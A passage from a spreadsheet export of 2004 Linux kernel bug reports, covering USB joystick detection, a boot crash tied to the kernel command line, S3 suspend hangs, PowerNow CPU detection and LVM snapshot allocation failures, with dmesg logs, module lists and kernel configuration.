snd_page_alloc 11848 2 snd_intel8x0,snd_pcm snd_mpu401_uart 8128 1 snd_intel8x0 snd_rawmidi 25892 1 snd_mpu401_uart snd_seq_device 8840 1 snd_rawmidi snd 57700 9 snd_intel8x0,snd_ac97_codec,snd_pcm,snd_timer,snd_mpu401_uart,snd_rawmidi,snd_seq_device soundcore 10336 1 snd ehci_hcd 43908 0 ohci_hcd 33860 0 nvidia_agp 7772 1 agpgart 34216 2 nvidia_agp evdev 9728 0 w83627hf 29188 0 eeprom 8200 0 i2c_sensor 4352 2 w83627hf,eeprom i2c_isa 2048 0 i2c_nforce2 6272 0 i2c_core 26896 5 w83627hf,eeprom,i2c_sensor,i2c_isa,i2c_nforce2 nvidia 4819540 12 sg 38688 0 Ok now reconnect my psx adapter: tail -f /var/log/messages Aug 23 18:04:28 midallbox kernel: usb 2-3: new low speed USB device using address 10 Aug 23 18:04:28 midallbox kernel: usb 2-3: Product: USB Game Device Aug 23 18:04:28 midallbox kernel: drivers/usb/input/hid-core.c: ctrl urb status -32 received Aug 23 18:04:28 midallbox kernel: drivers/usb/input/hid-core.c: ctrl urb status -32 received Aug 23 18:04:28 midallbox kernel: input: USB HID v1.00 Joystick [04b4:c681] on usb-0000:00:02.1-3 Yhea my device lives!!! lsusb Bus 003 Device 001: ID 0000:0000 Bus 002 Device 010: ID 04b4:c681 Cypress Semiconductor Corp. Bus 002 Device 009: ID 04a9:1302 Canon, Inc. Bus 002 Device 008: ID 04a9:1038 Canon, Inc. Bus 002 Device 007: ID 04a9:108c Canon, Inc. Bus 002 Device 006: ID 04a9:1005 Canon, Inc. Bus 002 Device 001: ID 0000:0000 Bus 001 Device 001: ID 0000:0000 and the modules are: lsmod Module Size Used by joydev 10176 0 usb_storage 92208 0 usblp 13056 0 usbhid 35264 0 uhci_hcd 32780 0 ohci1394 34628 0 snd_intel8x0 35208 1 snd_ac97_codec 71940 1 snd_intel8x0 snd_pcm 98568 1 snd_intel8x0 snd_timer 26116 1 snd_pcm snd_page_alloc 11848 2 snd_intel8x0,snd_pcm snd_mpu401_uart 8128 1 snd_intel8x0 snd_rawmidi 25892 1 snd_mpu401_uart snd_seq_device 8840 1 snd_rawmidi snd 57700 9 snd_intel8x0,snd_ac97_codec,snd_pcm,snd_timer,snd_mpu401_uart,snd_rawmidi,snd_seq_device soundcore 10336 1 snd ehci_hcd 43908 0 ohci_hcd 33860 0 nvidia_agp 7772 1 agpgart 34216 2 nvidia_agp evdev 9728 0 w83627hf 29188 0 eeprom 8200 0 i2c_sensor 4352 2 w83627hf,eeprom i2c_isa 2048 0 i2c_nforce2 6272 0 i2c_core 26896 5 w83627hf,eeprom,i2c_sensor,i2c_isa,i2c_nforce2 nvidia 4819540 12 sg 38688 0 I ask you: where is the problem? in hotplug? is a bug for nforce2 motherboard? How do resolv this problem, i have found a bug? Thanks for your attention Steps to reproduce:</t>
  </si>
  <si>
    <t>Toralf Förster</t>
  </si>
  <si>
    <t>boot freeze after shutdown (seems to wake up from suspend on reboot)</t>
  </si>
  <si>
    <t>2004-10-19 13:55 UTC</t>
  </si>
  <si>
    <t>2004-12-28 11:40 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware 10.0 Hardware Environment: Laptop K8 3GHz 512 Mo (Acer Aspire 1511 LMi) Software Environment: gcc 3.4.2 grub 0.95 Problem Description: At boot, the kernel crashes systematically after device mapper initialization (in fact short after input layer init I guess) if I boot it with the following command line : kernel /boot/vmlinuz root=/dev/hda2 parport=auto psmouse.proto=imps (the last parameter is for emulating touchpad as I like). If I add anything after the last parameter, such as in : kernel /boot/vmlinuz root=/dev/hda2 parport=auto psmouse.proto=imps crashzone then the kernel boots OK. I suspect the command line is not parsed correctly and the "crashzone" is a safe way to confine the bug. dmesg output appended. Steps to reproduce: Not sure it'll be reproducable with other hardware. Compile a kernel to run on a laptop and configure touchpad at boot with grub bootloader (it may also be a grub bug ?). Boot and see. dmesg output (the crash is marked in the output as I can see on the screen): Linux version 2.6.9 (root@athor) (gcc version 3.4.2) #4 Tue Oct 19 22:13:11 CEST 2004 BIOS-provided physical RAM map: BIOS-e820: 0000000000000000 - 000000000009b800 (usable) BIOS-e820: 000000000009b800 - 00000000000a0000 (reserved) BIOS-e820: 00000000000d0000 - 0000000000100000 (reserved) BIOS-e820: 0000000000100000 - 000000001ff70000 (usable) BIOS-e820: 000000001ff70000 - 000000001ff7f000 (ACPI data) BIOS-e820: 000000001ff7f000 - 000000001ff80000 (ACPI NVS) BIOS-e820: 000000001ff80000 - 0000000020000000 (reserved) BIOS-e820: 00000000fff80000 - 0000000100000000 (reserved) 511MB LOWMEM available. On node 0 totalpages: 130928 DMA zone: 4096 pages, LIFO batch:1 Normal zone: 126832 pages, LIFO batch:16 HighMem zone: 0 pages, LIFO batch:1 DMI present. ACPI: RSDP (v000 PTLTD ) @ 0x000f6ea0 ACPI: RSDT (v001 PTLTD RSDT 0x06040000 LTP 0x00000000) @ 0x1ff792fd ACPI: FADT (v001 NVIDIA CK8 0x06040000 PTL_ 0x000f4240) @ 0x1ff7ee3e ACPI: MADT (v001 NVIDIA NV_APIC_ 0x06040000 LTP 0x00000000) @ 0x1ff7eeb2 ACPI: SSDT (v001 PTLTD POWERNOW 0x06040000 LTP 0x00000001) @ 0x1ff7ef02 ACPI: BOOT (v001 PTLTD $SBFTBL$ 0x06040000 LTP 0x00000001) @ 0x1ff7efd8 ACPI: DSDT (v001 NVIDIA CK8 0x06040000 MSFT 0x0100000e) @ 0x00000000 ACPI: Local APIC address 0xfee00000 ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled) Processor #0 15:4 APIC version 16 ACPI: LAPIC_NMI (acpi_id[0x00] high edge lint[0x1]) ACPI: IOAPIC (id[0x02] address[0xfec00000] gsi_base[0]) IOAPIC[0]: apic_id 2, version 17, address 0xfec00000, GSI 0-23 ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 high level) ACPI: IRQ9 used by override. Enabling APIC mode: Flat. Using 1 I/O APICs Using ACPI (MADT) for SMP configuration information Built 1 zonelists Kernel command line: root=/dev/hda2 parport=auto psmouse.proto=imps gropf Initializing CPU#0 CPU 0 irqstacks, hard=c0576000 soft=c0575000 PID hash table entries: 2048 (order: 11, 32768 bytes) Detected 1795.428 MHz processor. Using tsc for high-res timesource Console: colour VGA+ 80x25 Dentry cache hash table entries: 131072 (order: 7, 524288 bytes) Inode-cache hash table entries: 65536 (order: 6, 262144 bytes) Memory: 513300k/523712k available (3069k kernel code, 9852k reserved, 1286k data, 180k init, 0k highmem) Checking if this processor honours the WP bit even in supervisor mode... Ok. Calibrating delay loop... 3555.32 BogoMIPS (lpj=1777664) Mount-cache hash table entries: 512 (order: 0, 4096 bytes) CPU: After generic identify, caps: 078bfbff e1d3fbff 00000000 00000000 CPU: After vendor identify, caps: 078bfbff e1d3fbff 00000000 00000000 CPU: L1 I Cache: 64K (64 bytes/line), D cache 64K (64 bytes/line) CPU: L2 Cache: 1024K (64 bytes/line) CPU: After all inits, caps: 078bfbff e1d3fbff 00000000 00000010 Intel machine check architecture supported. Intel machine check reporting enabled on CPU#0. CPU: AMD Athlon 64 Processor 3000+ stepping 0a Enabling fast FPU save and restore... done. Enabling unmasked SIMD FPU exception support... done. Checking 'hlt' instruction... OK. ACPI-0291: *** Info: Table [DSDT] replaced by host OS ENABLING IO-APIC IRQs ..TIMER: vector=0x31 pin1=0 pin2=-1 NET: Registered protocol family 16 PCI: PCI BIOS revision 2.10 entry at 0xfd69c, last bus=2 PCI: Using configuration type 1 mtrr: v2.0 (20020519) ACPI: Subsystem revision 20040816 ACPI: Interpreter enabled ACPI: Using IOAPIC for interrupt routing ACPI: PCI Root Bridge [PCI0] (00:00) PCI: Probing PCI hardware (bus 00) ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] ACPI: Embedded Controller [EC0] (gpe 37) ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P2P0._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.AGP0._PRT] ACPI: PCI Interrupt Link [LNK1] (IRQs 16 17 18 19) *0 ACPI: PCI Interrupt Link [LNK2] (IRQs 16 17 18 19) *0 ACPI: PCI Interrupt Link [LNK3] (IRQs 16 17 18 19) *0 ACPI: PCI Interrupt Link [LNK4] (IRQs 16 17 18 19) *0 ACPI: PCI Interrupt Link [LNK5] (IRQs 16 17 18 19) *0 ACPI: PCI Interrupt Link [LSMB] (IRQs 20 21) *0 ACPI: PCI Interrupt Link [LUS0] (IRQs 20 21) *0 ACPI: PCI Interrupt Link [LUS1] (IRQs 20 21) *0 ACPI: PCI Interrupt Link [LUS2] (IRQs 20 21) *0 ACPI: PCI Interrupt Link [LMAC] (IRQs 20 21) *0, disabled. ACPI: PCI Interrupt Link [LACI] (IRQs 22) *0 ACPI: PCI Interrupt Link [LMCI] (IRQs 20 21) *0 ACPI: PCI Interrupt Link [LPID] (IRQs 20 21) *0, disabled. ACPI: PCI Interrupt Link [LTID] (IRQs 20 21) *0, disabled. SCSI subsystem initialized Linux Kernel Card Services options: [pci] [cardbus] [pm] usbcore: registered new driver usbfs usbcore: registered new driver hub PCI: Using ACPI for IRQ routing ACPI: PCI Interrupt Link [LSMB] enabled at IRQ 21 ACPI: PCI interrupt 0000:00:01.1[A] -&gt; GSI 21 (level, low) -&gt; IRQ 21 ACPI: PCI Interrupt Link [LUS0] enabled at IRQ 20 ACPI: PCI interrupt 0000:00:02.0[A] -&gt; GSI 20 (level, low) -&gt; IRQ 20 ACPI: PCI Interrupt Link [LUS1] enabled at IRQ 21 ACPI: PCI interrupt 0000:00:02.1[B] -&gt; GSI 21 (level, low) -&gt; IRQ 21 ACPI: PCI Interrupt Link [LUS2] enabled at IRQ 20 ACPI: PCI interrupt 0000:00:02.2[C] -&gt; GSI 20 (level, low) -&gt; IRQ 20 ACPI: PCI Interrupt Link [LACI] enabled at IRQ 22 ACPI: PCI interrupt 0000:00:06.0[A] -&gt; GSI 22 (level, low) -&gt; IRQ 22 ACPI: PCI Interrupt Link [LMCI] enabled at IRQ 21 ACPI: PCI interrupt 0000:00:06.1[B] -&gt; GSI 21 (level, low) -&gt; IRQ 21 ACPI: PCI Interrupt Link [LNK2] enabled at IRQ 19 ACPI: PCI interrupt 0000:02:06.0[A] -&gt; GSI 19 (level, low) -&gt; IRQ 19 ACPI: PCI Interrupt Link [LNK3] enabled at IRQ 18 ACPI: PCI interrupt 0000:02:07.0[A] -&gt; GSI 18 (level, low) -&gt; IRQ 18 ACPI: PCI Interrupt Link [LNK5] enabled at IRQ 17 ACPI: PCI interrupt 0000:02:07.1[B] -&gt; GSI 17 (level, low) -&gt; IRQ 17 ACPI: PCI Interrupt Link [LNK4] enabled at IRQ 16 ACPI: PCI interrupt 0000:02:08.0[A] -&gt; GSI 16 (level, low) -&gt; IRQ 16 ACPI: PCI Interrupt Link [LNK1] enabled at IRQ 19 ACPI: PCI interrupt 0000:01:00.0[A] -&gt; GSI 19 (level, low) -&gt; IRQ 19 NET: Registered protocol family 23 Simple Boot Flag at 0x36 set to 0x1 Machine check exception polling timer started. Initializing Cryptographic API ACPI: AC Adapter [ACAD] (on-line) ACPI: Battery Slot [BAT1] (battery absent) ACPI: Power Button (FF) [PWRF] ACPI: Lid Switch [LID] ACPI: Sleep Button (CM) [SLPB] ACPI: Processor [CPU0] (supports C1 C2) ACPI: Thermal Zone [THRM] (42 C) lp: driver loaded but no devices found Real Time Clock Driver v1.12 Non-volatile memory driver v1.2 Linux agpgart interface v0.100 (c) Dave Jones agpgart: Detected AGP bridge 0 agpgart: Setting up Nforce3 AGP. agpgart: Maximum main memory to use for agp memory: 439M agpgart: AGP aperture is 128M @ 0xd8000000 serio: i8042 AUX port at 0x60,0x64 irq 12 serio: i8042 KBD port at 0x60,0x64 irq 1 Serial: 8250/16550 driver $Revision: 1.90 $ 8 ports, IRQ sharing disabled ttyS1 at I/O 0x2f8 (irq = 3) is a NS16550A ACPI: PCI interrupt 0000:00:06.1[B] -&gt; GSI 21 (level, low) -&gt; IRQ 21 parport0: PC-style at 0x378 (0x778), irq 7, using FIFO [PCSPP,TRISTATE,COMPAT,EPP,ECP] lp0: using parport0 (interrupt-driven). loop: loaded (max 8 devices) tg3.c:v3.10 (September 14, 2004) ACPI: PCI interrupt 0000:02:06.0[A] -&gt; GSI 19 (level, low) -&gt; IRQ 19 eth0: Tigon3 [partno(BCM95788A50) rev 3003 PHY(5705)] (PCI:33MHz:32-bit) 10/100/1000BaseT Ethernet 00:c0:9f:3e:de:12 eth0: RXcsums[1] LinkChgREG[0] MIirq[0] ASF[0] Split[0] WireSpeed[0] TSOcap[1] PPP generic driver version 2.4.2 PPP Deflate Compression module registered PPP BSD Compression module registered NET: Registered protocol family 24 Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx NFORCE3-150: IDE controller at PCI slot 0000:00:08.0 NFORCE3-150: chipset revision 165 NFORCE3-150: not 100% native mode: will probe irqs later NFORCE3-150: BIOS didn't set cable bits correctly. Enabling workaround. NFORCE3-150: 0000:00:08.0 (rev a5) UDMA133 controller ide0: BM-DMA at 0x2080-0x2087, BIOS settings: hda:DMA, hdb:pio ide1: BM-DMA at 0x2088-0x208f, BIOS settings: hdc:DMA, hdd:pio Probing IDE interface ide0... hda: IC25N060ATMR04-0, ATA DISK drive Using anticipatory io scheduler ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 Probing IDE interface ide1... hdc: MATSHITADVD-RAM UJ-820S, ATAPI CD/DVD-ROM drive ide1 at 0x170-0x177,0x376 on irq 15 Probing IDE interface ide2... ide2: Wait for ready failed before probe ! Probing IDE interface ide3... ide3: Wait for ready failed before probe ! Probing IDE interface ide4... ide4: Wait for ready failed before probe ! Probing IDE interface ide5... ide5: Wait for ready failed before probe ! hda: max request size: 1024KiB hda: 117210240 sectors (60011 MB) w/7884KiB Cache, CHS=16383/255/63, UDMA(100) hda: cache flushes supported hda: hda1 hda2 hda3 hdc: ATAPI 24X DVD-ROM DVD-R-RAM CD-R/RW drive, 2048kB Cache, UDMA(33) Uniform CD-ROM driver Revision: 3.20 ieee1394: Initialized config rom entry `ip1394' ohci1394: $Rev: 1223 $ Ben Collins &lt;bcollins@debian.org&gt; ACPI: PCI interrupt 0000:02:07.1[B] -&gt; GSI 17 (level, low) -&gt; IRQ 17 ohci1394: fw-host0: OHCI-1394 1.1 (PCI): IRQ=[17] MMIO=[d0117000-d01177ff] Max Packet=[2048] video1394: Installed video1394 module ieee1394: raw1394: /dev/raw1394 device initialized eth1394: $Rev: 1224 $ Ben Collins &lt;bcollins@debian.org&gt; eth1394: eth1: IEEE-1394 IPv4 over 1394 Ethernet (fw-host0) ACPI: PCI interrupt 0000:02:07.0[A] -&gt; GSI 18 (level, low) -&gt; IRQ 18 Yenta: CardBus bridge found at 0000:02:07.0 [1025:0059] Yenta: ISA IRQ mask 0x0c78, PCI irq 18 Socket status: 30000006 ACPI: PCI interrupt 0000:00:02.2[C] -&gt; GSI 20 (level, low) -&gt; IRQ 20 ehci_hcd 0000:00:02.2: nVidia Corporation nForce3 USB 2.0 PCI: Setting latency timer of device 0000:00:02.2 to 64 ehci_hcd 0000:00:02.2: irq 20, pci mem e087c000 ehci_hcd 0000:00:02.2: new USB bus registered, assigned bus number 1 PCI: cache line size of 64 is not supported by device 0000:00:02.2 ehci_hcd 0000:00:02.2: USB 2.0 enabled, EHCI 1.00, driver 2004-May-10 hub 1-0:1.0: USB hub found hub 1-0:1.0: 6 ports detected ohci_hcd: 2004 Feb 02 USB 1.1 'Open' Host Controller (OHCI) Driver (PCI) ACPI: PCI interrupt 0000:00:02.0[A] -&gt; GSI 20 (level, low) -&gt; IRQ 20 ohci_hcd 0000:00:02.0: nVidia Corporation nForce3 USB 1.1 PCI: Setting latency timer of device 0000:00:02.0 to 64 ohci_hcd 0000:00:02.0: irq 20, pci mem e087e000 ohci_hcd 0000:00:02.0: new USB bus registered, assigned bus number 2 hub 2-0:1.0: USB hub found hub 2-0:1.0: 3 ports detected ACPI: PCI interrupt 0000:00:02.1[B] -&gt; GSI 21 (level, low) -&gt; IRQ 21 ohci_hcd 0000:00:02.1: nVidia Corporation nForce3 USB 1.1 (#2) PCI: Setting latency timer of device 0000:00:02.1 to 64 ohci_hcd 0000:00:02.1: irq 21, pci mem e0880000 ohci_hcd 0000:00:02.1: new USB bus registered, assigned bus number 3 ohci_hcd 0000:00:02.0: wakeup hub 3-0:1.0: USB hub found hub 3-0:1.0: 3 ports detected usbcore: registered new driver usblp drivers/usb/class/usblp.c: v0.13: USB Printer Device Class driver Initializing USB Mass Storage driver... usbcore: registered new driver usb-storage USB Mass Storage support registered. usbcore: registered new driver hiddev usbcore: registered new driver usbhid drivers/usb/input/hid-core.c: v2.0:USB HID core driver usbcore: registered new driver usbnet mice: PS/2 mouse device common for all mice input: AT Translated Set 2 keyboard on isa0060/serio0 ieee1394: Host added: ID:BUS[0-00:1023] GUID[00c09f000019adc5] usb 2-2: new low speed USB device using address 2 input: USB HID v1.10 Mouse [Logitech USB Receiver] on usb-0000:00:02.0-2 input: PS/2 Synaptics TouchPad on isa0060/serio1 input: PC Speaker device-mapper: 4.1.0-ioctl (2003-12-10) initialised: dm@uk.sistina.com *** Here is the crash *** Advanced Linux Sound Architecture Driver Version 1.0.6 (Sun Aug 15 07:17:53 2004 UTC). ACPI: PCI interrupt 0000:00:06.0[A] -&gt; GSI 22 (level, low) -&gt; IRQ 22 PCI: Setting latency timer of device 0000:00:06.0 to 64 usb 2-3: new full speed USB device using address 3 scsi0 : SCSI emulation for USB Mass Storage devices Vendor: Generic Model: Flash R/W Rev: 2002 Type: Direct-Access ANSI SCSI revision: 02 Attached scsi removable disk sda at scsi0, channel 0, id 0, lun 0 Attached scsi generic sg0 at scsi0, channel 0, id 0, lun 0, type 0 USB Mass Storage device found at 3 intel8x0_measure_ac97_clock: measured 49510 usecs intel8x0: clocking to 47372 ALSA device list: #0: NVidia nForce3 at 0xd0002000, irq 22 NET: Registered protocol family 2 IP: routing cache hash table of 4096 buckets, 32Kbytes TCP: Hash tables configured (established 32768 bind 65536) ip_conntrack version 2.1 (4091 buckets, 32728 max) - 300 bytes per conntrack ip_tables: (C) 2000-2002 Netfilter core team ipt_recent v0.3.1: Stephen Frost &lt;sfrost@snowman.net&gt;. http://snowman.net/projects/ipt_recent/ Initializing IPsec netlink socket NET: Registered protocol family 1 NET: Registered protocol family 17 NET: Registered protocol family 15 IrCOMM protocol (Dag Brattli) powernow-k8: Found 1 AMD Athlon 64 / Opteron processors (version 1.00.09b) powernow-k8: 0 : fid 0xa (1800 MHz), vid 0x2 (1500 mV) powernow-k8: 1 : fid 0x8 (1600 MHz), vid 0x6 (1400 mV) powernow-k8: 2 : fid 0x0 (800 MHz), vid 0x12 (1100 mV) powernow-k8: cpu_init done, current fid 0xa, vid 0x2 ACPI: (supports S0 S3 S4 S5) ACPI wakeup devices: PCI0 USB0 USB1 USB2 MCI0 GIGA LID EXT3-fs: mounted filesystem with ordered data mode. VFS: Mounted root (ext3 filesystem) readonly. Freeing unused kernel memory: 180k freed kjournald starting. Commit interval 5 seconds Adding 506008k swap on /dev/mapper/sswap0. Priority:-1 extents:1 EXT3 FS on hda2, internal journal ndiswrapper version 0.9 loaded ndiswrapper: driver bcmwl5.sys added ACPI: PCI interrupt 0000:02:08.0[A] -&gt; GSI 16 (level, low) -&gt; IRQ 16 ndiswrapper: using irq 16 wlan0: ndiswrapper ethernet device 00:0b:6b:49:a4:3b using driver bcmwl5.sys ndiswrapper device wlan0 supports WPA with AES/CCMP and TKIP ciphers kjournald starting. Commit interval 5 seconds EXT3 FS on hda3, internal journal EXT3-fs: mounted filesystem with ordered data mode. process `named' is using obsolete setsockopt SO_BSDCOMPAT</t>
  </si>
  <si>
    <t>S3: suspend hang - HP/Compaq nx7010/nw8000/nx5000, Compaq Presario X1000</t>
  </si>
  <si>
    <t>2.6.5 through 2.6.9</t>
  </si>
  <si>
    <t>2004-10-20 06:50 UTC</t>
  </si>
  <si>
    <t>2006-11-11 03:50 UTC</t>
  </si>
  <si>
    <t>3909 3957</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 2 Hardware Environment: HP/Compaq nx7010 Software Environment: Problem Description: When the machine tries to enter S3 it just stops dead instead of suspending. It does not shutdown the screen, start blinking the power LED so it doesn't seem that it actually enters the state. The problem is not that the kernel stops somewhere. It goes as far as writing to the correct registers to enter the state. (One note is that it stops after writing to the first of the two regs but this behaviour also exists for S5, which works). I've tried with no modules loaded and all (relevant anyway), with and without X. The effect is the same. The hardware also gets into some funky state when you do this. Restarting the machine (holding down power of 4 sec) doesn't get it back up and running. It starts most of the hardware but the screen isn't turned on so I figure it crashes somewhere during BIOS startup. Restarting it a second time gets things back to normal. The problem has always been present since I bought the laptop. All stable releases since 2.6.5 through 2.6.9 have been tested. Steps to reproduce: 1. echo 3 &gt; /proc/acpi/sleep 2. Watch the machine seem to enter suspend 2. Wait until hell freezes over before it actually suspends</t>
  </si>
  <si>
    <t>Cpu recognization fails after upgrade from 2.6.7 to 2.6.9</t>
  </si>
  <si>
    <t>2004-10-20 07:13 UTC</t>
  </si>
  <si>
    <t>Daniele Bonomi</t>
  </si>
  <si>
    <t>2005-11-18 02:12 UTC</t>
  </si>
  <si>
    <t>Hardware Environment: acer 1356 lmi (laptop) with AMD athlon-xp 2800+ Problem Description: with linux 2.6.7 my processor is correctly recognized, this is the relative kernel output powernow: PowerNOW! Technology present. Can scale: frequency and voltage. powernow: FSB: 132.686 MHz powernow: Found PSB header at c00f06f0 powernow: Table version: 0x12 powernow: Flags: 0x0 (Mobile voltage regulator) powernow: Settling Time: 100 microseconds. powernow: Has 8 PST tables. (Only dumping ones relevant to this CPU). powernow: PST:3 (@c00f0746) powernow: cpuid: 0x7a0^Ifsb: 133^ImaxFID: 0x1a^Istartvid: 0x7 powernow: FID: 0x0 (11.0x [1459MHz])^IVID: 0xe (1.300V) powernow: FID: 0x1 (11.5x [1525MHz])^IVID: 0xd (1.350V) powernow: FID: 0x2 (12.0x [1592MHz])^IVID: 0xc (1.400V) powernow: FID: 0x3 (12.5x [1658MHz])^IVID: 0xb (1.450V) powernow: FID: 0x14 (13.0x [1724MHz])^IVID: 0xa (1.500V) powernow: FID: 0x15 (13.5x [1791MHz])^IVID: 0x9 (1.550V) powernow: FID: 0x18 (15.0x [1990MHz])^IVID: 0x8 (1.600V) powernow: FID: 0x1a (16.0x [2122MHz])^IVID: 0x7 (1.650V) powernow: SGTC: 13333 powernow: Minimum speed 1459 MHz. Maximum speed 2122 MHz. with 2.6.9 is not powernow: PowerNOW! Technology present. Can scale: frequency and voltage. powernow: No PST tables match this cpuid (0x7a0) powernow: This is indicative of a broken BIOS. powernow: Trying ACPI perflib powernow: Minimum speed 298 MHz. Maximum speed 796 MHz. Kernel configuration (for frequency scaling) is equal for both # # CPU Frequency scaling # CONFIG_CPU_FREQ=y CONFIG_CPU_FREQ_PROC_INTF=y # CONFIG_CPU_FREQ_DEFAULT_GOV_PERFORMANCE is not set CONFIG_CPU_FREQ_DEFAULT_GOV_USERSPACE=y CONFIG_CPU_FREQ_GOV_PERFORMANCE=y CONFIG_CPU_FREQ_GOV_POWERSAVE=y CONFIG_CPU_FREQ_GOV_USERSPACE=y CONFIG_CPU_FREQ_24_API=y CONFIG_CPU_FREQ_TABLE=y # # CPUFreq processor drivers # CONFIG_X86_ACPI_CPUFREQ=y CONFIG_X86_ACPI_CPUFREQ_PROC_INTF=y # CONFIG_X86_POWERNOW_K6 is not set CONFIG_X86_POWERNOW_K7=y # CONFIG_X86_POWERNOW_K8 is not set # CONFIG_X86_GX_SUSPMOD is not set # CONFIG_X86_SPEEDSTEP_CENTRINO is not set # CONFIG_X86_SPEEDSTEP_ICH is not set # CONFIG_X86_SPEEDSTEP_SMI is not set # CONFIG_X86_P4_CLOCKMOD is not set # CONFIG_X86_LONGRUN is not set # CONFIG_X86_LONGHAUL is not set lspci output is 00:00.0 Host bridge: VIA Technologies, Inc. VT8378 [KM400] Chipset Host Bridge 00:01.0 PCI bridge: VIA Technologies, Inc. VT8235 PCI Bridge 00:07.0 CardBus bridge: Texas Instruments PCI1410 PC card Cardbus Controller (rev 02) 00:08.0 FireWire (IEEE 1394): Texas Instruments TSB43AB21 IEEE-1394a-2000 Controller (PHY/Link) 00:09.0 Ethernet controller: Realtek Semiconductor Co., Ltd.: Unknown device 8180 (rev 20) 00:10.0 USB Controller: VIA Technologies, Inc. VT6202 [USB 2.0 controller] (rev 80) 00:10.1 USB Controller: VIA Technologies, Inc. VT6202 [USB 2.0 controller] (rev 80) 00:10.2 USB Controller: VIA Technologies, Inc. VT6202 [USB 2.0 controller] (rev 80) 00:10.3 USB Controller: VIA Technologies, Inc. USB 2.0 (rev 82) 00:11.0 ISA bridge: VIA Technologies, Inc. VT8235 ISA Bridge 00:11.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT823x/A/C/VT8235 PIPC Bus Master IDE (rev 06) 00:11.5 Multimedia audio controller: VIA Technologies, Inc. VT8233/A/8235/8237 AC97 Audio Controller (rev 50) 00:11.6 Communication controller: VIA Technologies, Inc. Intel 537 [AC97 Modem] (rev 80) 00:12.0 Ethernet controller: VIA Technologies, Inc. VT6102 [Rhine-II] (rev 74) 01:00.0 VGA compatible controller: ATI Technologies Inc RV250 5c61 [Radeon Mobility 9200 M9+] (rev 01) Thanks Daniele</t>
  </si>
  <si>
    <t>snapshot creation fails to allocate a page</t>
  </si>
  <si>
    <t>2004-10-21 04:17 UTC</t>
  </si>
  <si>
    <t>Enrico Scholz</t>
  </si>
  <si>
    <t>2007-11-13 05:02 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 2-3 based Software Environment: * kernel 2.6.9, 2.6.8.1 also (see notes below) * lvm-1.0.3-19.0 RPM from Fedora Core testing Problem Description: | $ VG=/dev/vg00 | $ lvcreate -L100M -s -n snap-usr $VG/usr | $ lvcreate -L100M -s -n snap-var $VG/var | Oct 21 04:44:48 delenn kernel: lvcreate: page allocation failure. order:0, mode:0xd0 | Oct 21 04:44:48 delenn kernel: [dump_stack+30/32] dump_stack+0x1e/0x20 | Oct 21 04:44:48 delenn kernel: [&lt;c010608e&gt;] dump_stack+0x1e/0x20 | Oct 21 04:44:48 delenn kernel: [__alloc_pages+587/960] __alloc_pages+0x24b/0x3c0 | Oct 21 04:44:48 delenn kernel: [&lt;c014a36b&gt;] __alloc_pages+0x24b/0x3c0 | Oct 21 04:44:48 delenn kernel: [alloc_pl+52/96] alloc_pl+0x34/0x60 | Oct 21 04:44:48 delenn kernel: [&lt;c028af54&gt;] alloc_pl+0x34/0x60 | Oct 21 04:44:48 delenn kernel: [client_alloc_pages+37/112] client_alloc_pages+0x25/0x70 | Oct 21 04:44:48 delenn kernel: [&lt;c028b0e5&gt;] client_alloc_pages+0x25/0x70 | Oct 21 04:44:48 delenn kernel: [kcopyd_client_create+101/192] kcopyd_client_create+0x65/0xc0 | Oct 21 04:44:48 delenn kernel: [&lt;c028bd15&gt;] kcopyd_client_create+0x65/0xc0 | Oct 21 04:44:48 delenn kernel: [pg0+138725689/1069442048] snapshot_ctr+0x329/0x3c0 [dm_snapshot] | Oct 21 04:44:48 delenn kernel: [&lt;c8864939&gt;] snapshot_ctr+0x329/0x3c0 [dm_snapshot] | Oct 21 04:44:48 delenn kernel: [dm_table_add_target+315/496] dm_table_add_target+0x13b/0x1f0 | Oct 21 04:44:49 delenn kernel: [&lt;c028688b&gt;] dm_table_add_target+0x13b/0x1f0 | Oct 21 04:44:49 delenn kernel: [populate_table+142/240] populate_table+0x8e/0xf0 | Oct 21 04:44:49 delenn kernel: [&lt;c028940e&gt;] populate_table+0x8e/0xf0 | Oct 21 04:44:50 delenn kernel: [table_load+102/336] table_load+0x66/0x150 | Oct 21 04:44:50 delenn kernel: [&lt;c02894d6&gt;] table_load+0x66/0x150 | Oct 21 04:44:50 delenn kernel: [ctl_ioctl+222/320] ctl_ioctl+0xde/0x140 | Oct 21 04:44:50 delenn kernel: [&lt;c0289d4e&gt;] ctl_ioctl+0xde/0x140 | Oct 21 04:44:50 delenn kernel: [sys_ioctl+530/1088] sys_ioctl+0x212/0x440 | Oct 21 04:44:50 delenn kernel: [&lt;c017a4d2&gt;] sys_ioctl+0x212/0x440 | Oct 21 04:44:50 delenn kernel: [syscall_call+7/11] syscall_call+0x7/0xb | Oct 21 04:44:50 delenn kernel: [&lt;c01051fb&gt;] syscall_call+0x7/0xb | Oct 21 04:44:50 delenn kernel: device-mapper: : Could not create kcopyd client | Oct 21 04:44:50 delenn kernel: | Oct 21 04:44:50 delenn kernel: device-mapper: error adding target to table | Oct 21 04:44:50 delenn kernel: FAT: bogus number of reserved sectors | Oct 21 04:44:50 delenn kernel: VFS: Can't find a valid FAT filesystem on dev dm-7. After this, the machine is foobared: every diskaccess blocks infinitely. I saw this with 2.6.8.1 sometimes (1-2 times per week by 2 snapshot creations per day) also, but with 2.6.9 it happens everytime.</t>
  </si>
  <si>
    <t>kernel-2.6.9 breaks Amanda</t>
  </si>
  <si>
    <t>2004-10-21 09:47 UTC</t>
  </si>
  <si>
    <t>Bill Ralph</t>
  </si>
  <si>
    <t>2004-11-02 11:34 UTC</t>
  </si>
  <si>
